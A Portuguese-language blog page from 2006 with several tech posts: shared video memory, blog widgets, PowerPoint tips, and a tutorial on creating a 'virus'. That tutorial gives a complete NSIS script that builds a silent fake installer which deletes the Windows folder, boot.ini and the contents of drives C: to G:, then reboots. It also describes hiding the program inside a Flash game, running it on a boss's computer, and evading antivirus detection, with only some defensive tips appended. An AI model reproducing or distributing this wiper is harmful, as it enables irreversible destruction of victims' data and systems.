Seu computador mostra menos memória do que tem?

Publicado em 16/08/2006 • Outros1 comentário »

por Marcos Elias

Meu computador sempre mostra menos memória do que ele tem, porque? O vendedor me enganou?

Calma... Provavelmente, não.

É comum em notebooks e micros com 256 MB de RAM, ficarem apenas 224 disponíveis para o sistema. Qualquer programa de monitoramento de memória detectará 224, e o sistema só usará isso. Cadê os outros 32?

Notebooks e muitos computadores têm placa de vídeo on-board, ou seja: os circuitos que controlam o vídeo (a exibição de coisas na tela, o envio de imagens para o monitor, etc) ficam diretamente na placa mãe, sem depender de uma placa adicional.

Isso tem suas vantagens e desvantagens. Com relação à memória: as placas de vídeo off-board, independentes (constituídas de uma peça que se encaixa num slot livre do computador), têm memória própria. Um ou mais chips nelas funciona como espaço para guardar as imagens e os dados gráficos, entre outros de controle. Já as placas embutidas na placa mãe, on-board, usam uma parte da memória RAM. Geralmente se deixa 32 MB para para o vídeo, esse valor normalmente pode ser configurado no BIOS, pelo SETUP. A memória de vídeo é necessária para armazenar as imagens exibidas na tela, atualizadas constantemente. Ao usar programas de edição de imagens, rodar jogos pesados e uma série de outros programas que exijam muito do hardware gráfico, a quantidade de memória de vídeo é um fator muito importante no desempenho e velocidade. E com relação ao preço, as placas on-board são mais baratas, mas têm o inconveniente de não permitir upgrade, e de serem muito limitadas. Praticamente sempre pode-se desativar a controladora de vídeo embutida na placa mãe para se instalar uma com mais recursos, especialmente para jogos. Corrigindo uma colocação popular, é errado dizer "placa de vídeo on-board", e sim "controladora de vídeo on-board". Isso porque não se trata de uma "placa" em si, já que os chips ficam grudados na própria placa mãe. As placas "verdadeiras", off-board, essas sim são "placas" com um circuito próprio, geralmente instaláveis num slot PCI, AGP ou, mais recentemente, PCI Express.

Então não há muito o que fazer. Se você tem um PC ou notebook com 256 MB e placa de vídeo on-board, quase sempre ficarão apenas 224 MB para o PC e 32 para o vídeo. É o que se chama de memória compartilhada. Num PC com 512 de RAM e vídeo de 128 MB compartilhados, o PC ficará com 512 - 128 = 384 MB. É como se só houvesse essa quantidade de memória instalada. Se você diminuir a quantidade de memória da placa de vídeo, pode até obter mais para o sistema, mas alguns jogos e programas que exijam mais memória de vídeo poderão ficar lentos - ou até mesmo não rodar.

A menos que você só usará aplicativos de escritório e Internet, como o Office, por exemplo, ou um joguinho vez ou outra, prefira computadores com placa de vídeo off-board. Para atividades básicas 4 ou 8 MB de vídeo são mais que o suficiente, aí tanto faz ser off ou on-board. Porém mesmo num ambiente 2D, sistemas como o Windows XP e o Vista, que vem por aí, eles mesmos requerem mais memória de vídeo.

É isso... Observe ao comprar o computador, evite a "memória compartilhada". Normalmente vem nas descrições como: "Vídeo: 128 MB compartilhados". No entanto, para uso básico, como comentado, é até besteira investir numa placa de vídeo poderosa, pois você vai pagar por uma coisa que não aproveitará totalmente, ela terá recursos de sobra que você não usará.

WWW: WebArtigos.com, artigos diversos

Publicado em 16/08/2006 • Outros1 comentário »

Leitura e publicação de artigos na web?

www.webartigos.com

Revista on-line brasileira que publica artigos em diversas áreas. Conta com vários articulistas que contribuem com textos semanalmente.

Dica: Como criar um vírus?

Publicado em 14/08/2006 • hacker, geek467 comentários »

por Marcos Elias

Pra que você quer saber como criar um vírus? Bem... A responsabilidade é sua, blz? Nesta dica você terá uma aulinha prática de como criar um vírus que detona TUDO do HD.

NÃO FAÇA COMENTÁRIOS COM MÁS INTENÇÕES. NÃO AJUDAREMOS VOCÊ A PREJUDICAR NINGUÉM. O CONTEÚDO DESTE ARTIGO VISA MOSTRAR NOÇÕES IMPORTANTES PARA TODOS OS LADOS. O USO QUE SE FARÁ DELE É DE TOTAL RESPONSABILIDADE DOS USUÁRIOS. COMENTÁRIOS INDESEJADOS SERÃO IGNORADOS, E CASO SEJAM OFENSIVOS OU VÁ CONTRA OS PRINCÍPIOS DO SITE, SERÃO REMOVIDOS SEM AVISO PRÉVIO.

Um vírus é um programa do mal, que faz mal ao sistema operacional, a outros programas ou a arquivos do computador. Podem ser ainda de outros tipos, mas estes são os mais comuns. Basicamente, um vírus é um programa. Um programa com instruções que poderiam ser usadas para o bem, mas aplicadas para o mal. Portanto, para fazer um vírus, aprenda a fazer programas. Existem, no entanto, meios mais simples que permitem a criação de vírus usando determinadas estratégias, ferramentas e recursos já existentes. Além de saber fazer o vírus, você deve saber o que ele fará. O vírus ataca alguma coisa. Você deve conhecer essa coisa, seus pontos fracos e fortes, verificar caminhos por onde entrar. E como rodá-lo? O meio mais simples é convencer os usuários a executar o arquivo do vírus nos seus computadores. Ou você mesmo, por exemplo, pode executá-lo no computador do chefe enquanto ele estiver almoçando. Para ajudar, existem programas que embutem um executável dentro de outro, de modo que um seja executado normalmente, e o outro de forma oculta. Isso permite, por exemplo, criar um joguinho em flash (ou pegar uma dessas muitas animações distribuídas em .exe, o projetor do flash), embutir o vírus nele e mandar pra pessoa. Ela abre, vê o joguinho, acha lindo. E por trás de tudo isso, enquanto ela está distraída e entretida, o vírus trabalha. Ou simplesmente se copia para alguma pasta, cria entradas no registro do Windows para se iniciar na próxima sessão, e ataca a partir dali.

E os anti-vírus, como ficam? Irão bloquear seu vírus? Eles não sabem se um programa é um vírus ou não, a menos que tenham a "identidade" deste programa marcada como "suja", como um vírus. Isso acontece quando o vírus fica muito divulgado, e acaba caindo nas mãos do pessoal das empresas de anti-vírus. Eles checam o arquivo, fazem testes e mais testes. Comprovado o caso de ser um vírus (ou seja, de ser um programa do mal), eles criam um código que identifica exclusivamente aquele arquivo (por exemplo, uma somatória MD5, um trecho de código existente no arquivo, uma seqüência de operações que provavelmente só existam naquele arquivo, etc). E cadastram esse código no anti-vírus. Ao fazer a varredura, se o anti-vírus identificar algum arquivo com algumas qualidades cadastradas em seu banco de dados, ele entenderá ele como vírus e tentará eliminá-lo ou notificar o usuário. Por isso é bom estar sempre com seu anti-vírus atualizado, pois praticamente todo dia surgem novos vírus. Estando atualizado, ele pode identificar os vírus mais recentes. Mesmo que um programa seja o pior vírus já inventado, se ele não estiver catalogado no anti-vírus, ele provavelmente se dará muito bem e executará suas funções. Depois? Depois é tarde, né. Já eu, particularmente, não uso anti-vírus, pois sei me cuidar. Não quero um programa verificando tudo o que faço e deixando meu micro mais lento. Muita gente reclama do Windows e talz e bla bla bla. Mas essa gente poderia parar um pouco e pensar nela mesma, nas atitudes. A maioria dos vírus e spywares só consegue realizar seus objetivos porque o usuário do computador vacilou. Mas blz, isso não vem ao caso agora.

Um vírus não precisa ser necessariamente um programa. Você deve estudar e conhecer o que quer atacar, e usar meios para isso. Por exemplo, apagar arquivos. Criar um ".bat" com o comando "deltree %systemroot%" adaptado para não mostrar nada, por exemplo. Esse arquivo pode ser considerado um vírus, embora é um simples arquivo ASCII, de texto puro. O interpretador de comandos é que vai executar as ações, de acordo com o que estiver indicado. De forma semelhante agem os vírus de scripts e macros: por isso, é bom tomar cuidado com apresentações do Power Point de desconhecidos, arquivos do Word, etc. Não precisa ser paranóico e ficar sem abrir esses arquivos, basta pensar e desativar as macros no seu programa, entre outros cuidados. Usar o visualizador do PowerPoint, em vez do PowerPoint completo, é uma boa idéia para ver apresentações da Internet, já que as macros e arquivos vinculados nem serão interpretados. No caso de scripts ".js" ou ".vbs", só execute-os se souber realmente o que está fazendo. Destaco que esse ".js" não é de "JavaScript", pois esta mesma extensão é usada por scripts inofensivos em páginas da web para adicionar funcionalidade. Como dito, cuide-se, mas não caia nas paranóias. Não é porque a AIDS come solto que você vai deixar de transar com pessoas que conhece a pouco tempo ou na balada, mas deverá se cuidar, né? A mesma coisa pode ser dita em termos de PCs. Execute programas, rode, teste, fuce, explore, mas com responsa. Isso fica por sua conta. Do mesmo jeito que "sexo 100% seguro é não fazer sexo", eu diria que "navegar na Internet de forma 100% segura é não navegar na Internet". Se você está na chuva, é para se molhar. Às vezes até mesmo com o melhor guarda-chuva ou capa você ainda se molha legal, e pode pegar um resfriado... Por essas e outras, arquivos e projetos importantes eu mantenho num PC sem acesso a Internet (nem modem nem placa de rede ele tem).

Bom, chega de teoria, não que não seja importante, mas já falei demais. Se você quer fazer vírus, arregace as mangas e parta para o estudo, você deverá estudar e fuçar muito. E cuidado para o feitiço não virar contra o feiticeiro, he he he.

Vou mostrar como fazer um simples programinha devastador, que apaga TUDO do HD. Tanto os arquivos do usuário como as pastas do sistema e os programas. Ele será rodado no Windows, então alguns arquivos de sistema não serão apagados porque estarão em uso. Mas apagando a maioria e alguns estratégicos, já é o suficiente para que o computador nem inicie, a menos que a pessoa formate e reinstale tudo (mas aí ela já teria perdido seus dados).

Apagar arquivos... Sugiro usar o gerador de programas de instalação NSIS (Nullsoft Scriptable Install System). Ele é destinado a desenvolvedores e distribuidores de aplicações, mas é muito versátil. Você cria um "falso" programa de instalação, que na real não instala é nada, apenas apaga coisas. Esse NSIS funciona com um script, você cria um arquivo de texto com as instruções, compila nele, e ele gera o executável baseado nessas instruções. O uso do NSIS é uma boa também porque o executável fica extremamente pequeno, com menos de 50 kb. Mas você poderia usar, é claro, outros instaladores...

Baixe o NSIS em nsis.sourceforge.net e instale-o. Ele é gratuito (e open source). Não vamos nos deter com o script dele, vamos direto ao assunto. Ele possui uma função "Delete", que apaga arquivos ou pastas. Basta você adicionar os nomes de arquivos ou pastas desejados, e gerar o programa. Esta função deveria ser usada para apagar arquivos de um programa que seria desinstalado, já que o NSIS é um criador de programas de instalação para outros programas. Mas como apaga arquivos que você define, pode ser usada para o mal também, só depende das suas intenções. Em menos de 1 minuto seu vírus estará pronto.

AVISO: SE FOR COPIAR E COLAR, CERTIFIQUE-SE DE QUE AS ASPAS ESTEJAM RETAS. SE APARECEREM ASPAS INCLINADAS, FRESQUINHAS E BONITINHAS, APAGUE-AS, SUBSTITUINDO POR ASPAS DUPLAS RETAS, NORMALMENTE FICA NA PARTE SUPERIOR DA TECLA ABAIXO DA ESC. SE USAR AS ASPAS ENFEITADAS NO ARQUIVO .NSI, O NSIS DARÁ UM ERRO NA COMPILAÇÃO. ESSE ERA O MOTIVO PELO QUAL MUITOS NÃO CONSEGUIAM COMPILAR. VEJA ESTE COMENTÁRIO QUE POSTEI.

Com o NSIS instalado, abra um editor de textos puro, como o Bloco de notas, e digite (ou copie e cole) o texto em vermelho:

!define PRODUCT_NAME "APAGADOR_XXX"
!define PRODUCT_VERSION "1.0"
!define PRODUCT_PUBLISHER "HACKER_XXX"

SetCompressor lzma

Name "${PRODUCT_NAME} ${PRODUCT_VERSION}"
OutFile "MeuVirus.exe"
InstallDir "$TEMP"
Icon "${NSISDIR}\Contrib\Graphics\Icons\modern-install.ico"
SilentInstall silent

Section "Sec001" SEC01
Delete /REBOOTOK "$WINDIR\*.*"
SectionEnd

Section -Post
Reboot
SectionEnd

Salve com a extensão ".nsi", e escolha "Todos os arquivos", no campo "Salvar como tipo". A extensão ".nsi" é a de projeto do NSIS, você poderia usar outra qualquer e depois abri-lo no compilador do NSIS ("Iniciar > Programas > MakeNSISW (Compiler GUI)").

DICA: BAIXE AQUI O ARQUIVO .NSI PRONTO, É SÓ COMPILAR!
(Não é o arquivo executável, você pode baixar sossegado(a). É apenas o arquivo de texto pronto. Você pode visualizá-lo no bloco de notas ou abri-no no NSIS, e é bem pequenininho. Ele está configurado para apagar arquivos de todas as unidades, o que conseguir, de forma a limpar pen drives se estiverem plugados na hora da execução. Cuidado, não clique no botão "Test Installer" em um computador com dados importantes.)

Vamos entender esse arquivo... As três primeiras linhas identificam o "programa" que seria instalado, afinal o NSIS é um instalador. Deixe como está, ou escreva qualquer coisa, de preferência não palavras. O item "OutFile" é o executável que será gerado, é o seu vírus que deverá ser distribuído. A linha "SilentInstall silent" gera um instalador oculto, que não mostra nada na tela. Ou seja, quando a vítima executá-lo, ele já começará a apagar tudo sem mostrar nada.

Na seção "Sec01", você deve adicionar as entradas "Delete" que desejar. Existem outros comandos, é possível, em vez de apagar arquivos, criar entradas no registro, instalar programas que se auto-executam, etc. Não me pergunte como fazer isso.

A linha "Delete /REBOOTOK "$WINDIR\*.*" apaga tudo da pasta do Windows, deixando para apagar na próxima inicialização o que estiver em uso. Copie-a e cole-a abaixo dela, antes do SectionEnd, trocando as pastas ou arquivos que você queira apagar. Por exemplo:

Delete /REBOOTOK "C:\boot.ini"
Delete /REBOOTOK "C:\Meus documentos\*.*"
Delete /REBOOTOK "C:\*.*"
Delete /REBOOTOK "D:\*.*"
Delete /REBOOTOK "E:\*.*"
Delete /REBOOTOK "F:\*.*"
Delete /REBOOTOK "G:\*.*"
Delete /REBOOTOK "C:\Arquivos de programas\*.*"

Adicione o que quiser, arquivos específicos, etc.

A última seção, "Section -Post / Reboot / SectionEnd", será executada ao concluir o instalador, ou seja, quando ele terminar sua ação. O comando "reboot" reiniciará o computador, que na próxima inicialização nem inicia mais. Se você quiser, pode remover essas três últimas linhas, para deixar o usuário em desespero, vendo que tudo do seu PC foi apagado.

Salve o arquivo. Abra o compilador do NSIS, em "Iniciar > Programas > MakeNSISW (Compiler GUI)", clique no menu "File > Load script", localize o arquivo de extensão ".nsi" que você salvou. Ele já compilará, é rapidinho. NÃO CLIQUE NO BOTÃO "TEST INSTALLER".

O vírus está pronto! E, em condições normais, nenhum anti-vírus o detectaria, a menos que ele fosse parar nas mãos de algum criador de anti-vírus.

Como testá-lo sem se ferrar por conta da própria criação? Use máquinas virtuais! Já comentei aqui no Explorando sobre o Bochs, na seção de matérias do site Mep Sites (materias.mepsites.cjb.net) você encontra um tutorial dele. Pode usar também o QEMU, com a ajuda do Kemula (kemula.mepsites.cjb.net), se precisar. Ou o comercial e carinho VMware. Usando uma máquina virtual você ferra apenas o sistema virtual, que pode ser facilmente restaurado se você tiver uma cópia dele em CD ou outra pasta. Dica: use máquinas virtuais também para testar pela primeira vez programas que você pega na Internet, e mais: navegue na Internet só pela máquina virtual! Quanto ao seu "virusinho", se preferir, teste num PC cobaia, onde você saiba que tudo pode ser apagado. Leia a ajuda do NSIS para ver outros comandos e constantes de pastas.

Fácil, não?

Claro, isso é só um exemplo, ideal para lammers ou gente que se acha (e que na real não sabe é nada). Ou mesmo para quem está curioso e iniciando. Para fazer vírus específicos é recomendável dominar uma linguagem de programação. E lembre-se: você deve saber o que o vírus fará, o que ele vai atacar, e mais, saber como atacar. Não adianta querer ver a agenda do celular da namorada se você não souber onde ela guarda o celular. Não adianta querer ferrar um programa se você não souber que arquivos ou chaves do registro ele utiliza.

Por essas e outras, muito, muito cuidado ao abrir programas da Internet. Não clique naqueles banners de propaganda suspeitos, com carinhas lindas. Não clique no anúncio "Almente o tamanho do seu pênis". Não veja as montagens de fotos que não sei quem fez de você com não sei quem lá, e que te deixou um recado no orkut. Cuidado com os joguinhos em flash "executáveis"; se eles forem de origem desconhecida, tome mais cuidado ainda, prefira ver as versões em páginas HTML com o ".swf" separado. Mesmo se foi um amigo confiável que te passou, ele pode ter pego num site malicioso sem saber, ou então recebeu do primo do colega do vizinho da tia de outra cidade. Se você navega na Internet e mantém arquivos importantes no seu computador, considere o uso de uma conta de usuário restrita para navegar, ou use a conta de "Convidado", é o melhor a ser feito. Mantenha suas partições no Windows formatadas em NTFS, pois ao usar uma conta restrita, ela não terá acesso completo aos arquivos do sistema nem das outras pastas. Se o apagador que mostrei como criar, por exemplo, fosse rodado com uma conta de usuário restrita numa partição em NTFS, ele não conseguiria apagar praticamente NADA da pasta do Windows nem das outras pastas. O maior estrago seria na conta de usuário usada para rodá-lo, por isso se fosse um usuário restrito ou o convidado, seus arquivos estariam a salvo. Note que mesmo em NTFS, se você usasse a conta de administrador, boa parte dessa proteção iria por água abaixo, já que normalmente os administradores podem apagar arquivos do sistema e das outras pastas. E um programa executado como administrador, tem todos os direitos concedidos à conta de administrador. Ao instalar um programa, desmarque na instalação tudo o que for suspeito, especialmente se não estiver documentado. Muitas barras de ferramentas extras que aparecem no seu navegador foram instaladas junto com algum programa que você instalou "conscientemente", clicando em tudo, sem ler nada. LEIA. LEIA TUDO O QUE PUDER. Muitos spywares são documentados na licença de uso de um software, e muitos brasileiros que já não têm costume de ler mesmo, assim instalam ele sem saber. Um software que se preze e que respeite seus usuários deixa bem claro suas condições de uso, você só usa se concordar. E nada mais justo, se não concordar, simplesmente NÃO UTILIZE.

Uma dica para usuários do Windows XP ou as versões superiores. Ao rodar um programa suspeito, ou animações em flash executáveis, joguinhos que se dizem que "não precisa instalar", etc, o Windows pode desativar algumas alterações que o programa tente realizar. Por exemplo, ele não conseguirá alterar NADA no registro, o que é uma grande vantagem. Claro, se o programa depender disso para funcionar, nada feito, ele não irá rodar ou mostrará uma série de mensagens de erro. Executar programas confiáveis assim pode fazer com que eles não funcionem também, pois é comum um programa ler e gravar dados no registro ao ser aberto ou fechado. Já um joguinho "não instalável" ou uma animação em flash não deveria fazer nada isso, né? Para executar um programa no modo restrito: clique com o botão direito do mouse no ícone do mesmo, escolha "Executar como". Deixe selecionado o seu nome de usuário, e deixe marcado o item "Proteger meu computador e meus dados contra atividades não autorizadas de programas". Dê OK. Abrindo o programa assim, entre outras coisas, ele não poderá alterar nada no registro do Windows. Se o item "Executar como" não aparecer no menu, selecione o arquivo, segure SHIFT e clique com o direito nele.

Para programas suspeitos ou totalmente desconhecidos, eu recomendo testar em máquinas virtuais, como comentei mais acima. É melhor. Se der pau, dá só nela (a menos que você tenha arquivos no seu PC na rede compartilhados com permissão de escrita). Apague o arquivo do HD virtual e recopie a pasta. É mais prático do que usar uma máquina cobaia, tendo que reinstalar ou reparar tudo.

Enfim, esta dica tem diversos públicos. Não estou incentivando o mal, mas tirando uma curiosidade de muita gente sobre os vírus. O uso que se fará dela é de responsabilidade de cada um, né?! Um martelo pode ser usado na construção da sua casa, dos seus móveis. Mas pode também servir também para estourar seus miolos. Tudo é relativo.

Espero que você use o que leu aqui com responsabilidade. "Sexo? Use camisinha". "Internet? Juízo, previna-se dos vírus". Boa sorte!

BLOG: 4 dicas de sites com coisas para colocar no seu blog

Publicado em 14/08/2006 • Outros10 comentários »

Aplicando AJAX fornecido por serviços gratuitos disponíveis na web, você adiciona interatividade facilmente nas suas páginas. Deixo aqui quatro dicas de sites com recursos para blogueiros... Um com "as manchetes do dia", outro que lista os seus vizinhos (os "seus vizinhos" mesmo!), e dois que oferecem um mural de recados.

Se você ainda não tem blog... É um site rápido, de fácil atualização... Onde você publica coisas na hora, sem precisar de conhecimentos avançados ou de programação. Os tópicos mais recentes ficam na página inicial, e os outros vão sendo arquivados mensalmente ou semanalmente... Em www.blogs.mepsites.cjb.net há uma série de dicas e um tutorial de como montar um, sem pagar nada.

Vamos às dicas dos sites:

Manchetes do dia
Que tal ter um quadro no seu blog com as palvras mais usadas recentemente nos seus posts? É isso que o ZoomClouds gera. Baseado no feed RSS da sua página, ele gera uma lista com as palavras mais usadas na forma de links, que quando clicados, mostram os posts que contém aqueles termos. As expressões mais usadas ficam maiores, você pode destacar e personalizar as cores também. Entre em www.zoomclouds.com, crie um login e senha, indique o feed RSS do seu blog e copie o código HTML gerado para o template (modelo) do seu blog.
Alguns provedores de blogs fornecem o feed RSS automaticamente, é o caso do mais popular deles, usado aqui pelo próprio Explorando e Aprendendo: o Blogger.com. Geralmente o endereço do seu feed no Blogger será "http://seublog.blogspot.com/atom.xml". Esse endereço é que deverá ser copiado e indicado no ZoomClouds.
Curiosidade: o termo "clouds" é usado porque esse tipo de visualização de palvras ficou conhecido como "tag cloud", "nuvem de tag". Ele mostra de forma rápida e visual, embora utilize-se de textos, os tópicos mais importantes ou mais acessados em um site. Na nova entrada do Portal Mep Sites mesmo, isso foi aplicado para acesso rápido às principais páginas; e o Explorando fica em destaque é lóoooogico :)

Seus vizinhos... Você conhece todos eles?
O FeedMap fornece um recurso interessante: seus vizinhos, no seu blog! Você cadastra seu blog e seu endereço físico (esqueça seu IP, estou falando da sua rua, da sua casa rs), e ele gera um mapa com todos os blogueiros cadastrados por perto. No mapa ficam marcações como o título, o endereço e o feed do blog! Vá em www.feedmap.net, cadastre sua página, e coloque o código HTML gerado no template do seu blog. Bastante útil para redes de amigos blogueiros!

Mural de recados
Comentários? Eu não gosto deles em blogs pessoais, muita gente também não. Fora que nos posts mais antigos, muitos ficam esquecidos. É bom ter um mural de recados. Se você nunca usou isso, pense na página de scraps do orkut. Seus amigos e visitantes deixam pequenas mensagens, visíveis a todo mundo, só que sem precisar cadastro - digitam o nome/email na hora, para "assinar". Existem muitos sites na Internet que fornecem esse recurso, citarei dois: o CBox e o Código Fonte. Basta se cadastrar, gerar o mural definindo algumas coisas (nome do seu blog/site, endereço dele, etc) e depois copiar e colar o código HTML no template. Geralmente você pode editar ou apagar comentários indesejáveis, entrando no site com seu login e senha. O CBox coloca menos propagandas, entre diversos outros é o que mais gostei. No entanto, na versão gratuita ele limita o número de palavras por mensagem, mas vale a pena, já que é para recados rápidos mesmo. O Código Fonte tem uma série de outros recursos, como contador de visitas também, mas mostra propagandas no mural. Vale por ser brasileiro :)
CBox: www.cbox.ws
Código Fonte: www.codigofonte.net

Dica extra
Aproveitando a oportunidade, uma dica para quem usa contadores de acesso no blog: se possível, COLOQUE-O SOMENTE NA PÁGINA INICIAL. Colocar em qualquer lugar do template faz com que ele apareça em todas as páginas, e contabilize todas. Serviços mais elaborados marcarão apenas um visitante único por sessão, mesmo que o visitante abra diversas páginas do seu blog. Agora, o número de page views (visualizações de página) será um valor falso, já que contará mais vezes. No Blogger.com, coloque o código do contador entre as tags <MainPage> e </MainPage>, assim ele só será exibido na página inicial (você pode usar essas tags em qualquer lugar do template).

Lembre-se que em blogs.mepsites.cjb.net você encontra dicas e sites para blogs, além de links para todos os itens para blogueiros já publicados aqui no Explorando.

PPS: Dicas de controle da apresentação, otimização de imagens e inclusão de fontes

Publicado em 14/08/2006 • OutrosPostar comentário »

por Marcos Elias

Muita gente usa o Microsoft PowerPoint para exibir apresentações em palestras, reuniões, conferências, num telão ou com um projetor, ou mesmo numa TV ou monitor de computador. Eis algumas dicas para aplicação durante a apresentação, e algumas outras válidas para todo mundo:

- Clicando com o botão direito na tela, você tem opões de controle, como voltar e avançar, ou ir para um slide específico.

- Para ocultar o cursor do mouse, dê um toque na tecla do sinal de igual (=). Tecle = novamente para mostrar o mouse.

- Dependendo da situação, é útil deixar a tela escura. Por exemplo, enquanto você estiver respondendo a perguntas da platéia ou comentando sobre outros assuntos. Basta teclar a tecla do ponto final (.). Se quiser deixar a tela branca (em vez de preta), tecle a vírgula. Essas opções podem ser acessadas também ao clicar com o botão direito na tela, mas o menu apareceria; usar o teclado fica "mais elegante" e profissional.

- É terrível abrir uma apresentação carregada no editor do PowerPoint para visualização. Ele mostra a tela de entrada, demora um pouquinho mais, e você tem que teclar F5 ou ir para os menus (às vezes até se embanana e paga moh mico, visto o nervosismo diante da apresentação em público que muitas pessoas sentem). Salve a apresentação de modo que ela já seja iniciada em tela cheia, ao clicar no ícone do arquivo. No PowerPoint, escolha "Arquivo > Salvar como", e escolha "Apresentação do PowerPoint (*.pps)" no campo "Salvar como tipo". Se você não sabe, apresentações de extensão ".ppt" abrem dentro do PowerPoint, para edição. Já apresentações ".pps" abrem direto em tela cheia. Se você já tem o ".ppt", basta renomeá-lo para ".pps" (para isso, a opção de mostrar extensões de arquivos deverá estar ativada nas 'Opções de pasta' do Windows, em "Meu computador > Ferramentas ou Exibir > Opções de pasta"). É bom fazer isso também ao publicar apresentações ou enviar para amigos. Para editar apresentações em ".pps", abra o PowerPoint, vá em "Arquivo > Abrir" e localize então a apresentação, ela será aberta no modo de edição.

- Use fontes comuns. Arial, Verdana, Comics Sans, Tahoma, Courier New, Trebuchet MS... São fontes que já vem no Windows. A Century Gothic e algumas outras já vem com o Office, portanto não deverá haver problemas na hora da apresentação em outros computadores. Evite usar a fonte "Times New Roman", ela é ideal para materiais impressos, mas é terrível na tela. Para grandes blocos de texto, prefira Arial, Verdana ou Tahoma.

- Títulos com fontes especiais? Se não houver necessidade de edição onde a apresentação for ser exibida, prefira criar os títulos em imagens. Recomendo o Fireworks, da Macromedia/Adobe. Você gera o texto, aplica os efeitos gráficos desejados, deixa o fundo com uma cor próxima do fundo desejado para a apresentação e então exporta como GIF, de preferência com fundo transparente. Escolher a cor do fundo para depois exportar com fundo transparente, que doideira é essa? Não é doideira. Fazendo isso, as bordas das fontes não ficarão tão irregulares e "brancas", mas sim mais próximas do fundo da apresentação; muitas vezes até parecerá uma peça só no resultado final. Isso vale também para sites da web. Passo a passo no Fireworks: Clique no menu "Modificar > Tela > Cor da tela", e escolha uma cor próxima da cor de fundo da apresentação ou da estrutura que receberá a imagem. Na hora de exportar, clique em "Arquivo > Visualizar exportação", escolha GIF e selecione o item "Transparência do índice". Modifique a cor de fundo no original para publicar em outros materiais, você sentirá a diferença. Salve o modelo em ".png" do Fireworks, para que você possa editar essa imagem depois sem precisar digitar o texto novamente ou aplicar os efeitos desejados (se não salvar o ".png", você poderá "nunca mais" conseguir construir um logotipo ou título igual ao que tinha criado, especialmente se ele possuir diversos efeitos aplicados).

- Se necessário for, e somente se necessário, incorpore as fontes menos comuns utilizadas na apresentação. Isso faz com que elas sejam exibidas exatamente da forma como você definiu, mesmo que essas fontes não estejam instaladas nos computadores onde a apresentação for ser exibida. Note que o tamanho do arquivo da apresentação poderá ficar um pouco maior, já que os arquivos de fontes serão embutidos nele. Use apenas fontes TrueType (padrão no Windows e praticamente 101% das fontes disponíveis na Internet, rs). Para incorporar, vá em "Arquivo > Salvar como". Clique no menu "Ferramentas", no canto superior direito da janela de salvar, e escolha "Opções de salvamento". Marque a opção "Incorporar fontes TrueType". Para deixar o arquivo menor, escolha o item "Incorporar somente caracteres em uso". Se a apresentação precisar ser editada em outros computadores, é bom então incorporar todos os caracteres. Todavia, sempre é bom ter o "original", pois depois você pode ter problemas na edição, especialmente se incorporar apenas os caracteres em uso.

É isso por hoje... Divirta-se e aumente sua produtividade!